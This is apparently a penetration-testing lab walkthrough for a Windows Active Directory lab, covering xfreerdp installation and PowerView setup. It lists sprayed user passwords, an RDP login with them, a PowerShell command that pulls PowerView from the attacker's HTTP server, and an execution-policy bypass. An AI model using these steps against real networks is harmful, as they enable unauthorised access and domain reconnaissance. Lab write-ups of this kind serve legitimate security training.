Setting Up PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

We have the following credentials and by spraying the credentials and trying to authenticate to different servers and service you will see that elena.lopez has RDP access to 192.168.56.22

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1

Installing xFreeRDP

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

From there it may prompt you and tell you the dependencies are out of date, 
if it does, choose no. The second one to pop up I selected yes 
to downgrade the dependencies to the correct version.

sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b} 
0 packages upgraded, 1 newly installed, 0 to remove and 228 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.9.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]                       



Accept this solution? [Y/n/q/?] n
The following actions will resolve these dependencies:

     Downgrade the following packages:                                                                       
1)     libfreerdp-client2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]
2)     libfreerdp2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]       
3)     libwinpr2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]         



Accept this solution? [Y/n/q/?] y
The following packages will be DOWNGRADED:
  libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2 
The following NEW packages will be installed:
  freerdp2-x11 
0 packages upgraded, 1 newly installed, 3 downgraded, 0 to remove and 228 not upgraded.
Need to get 1,241 kB of archives. After unpacking 729 kB will be used.
Do you want to continue? [Y/n/?] y

RDP to Yonkers (192.168.56.22)

xfreerdp /d:north.newyork.local /u:elena.lopez /p:'princesa1' /v:192.168.56.22 /size:80%  /cert-ignore

DownLoading PowerView.ps1 to ParrotOS Lab Machine

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Setup HTTP Server From ParrotOS Lab Machine

python3 -m http.server

Downloading Powerview From ParrotOS Lab Machine

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

PowerView Intro

Powershell -ep bypass
Import-Module .\PowerView.ps1
Get-NetUser
PreviousPowerviewNextGet-NetUser

Last updated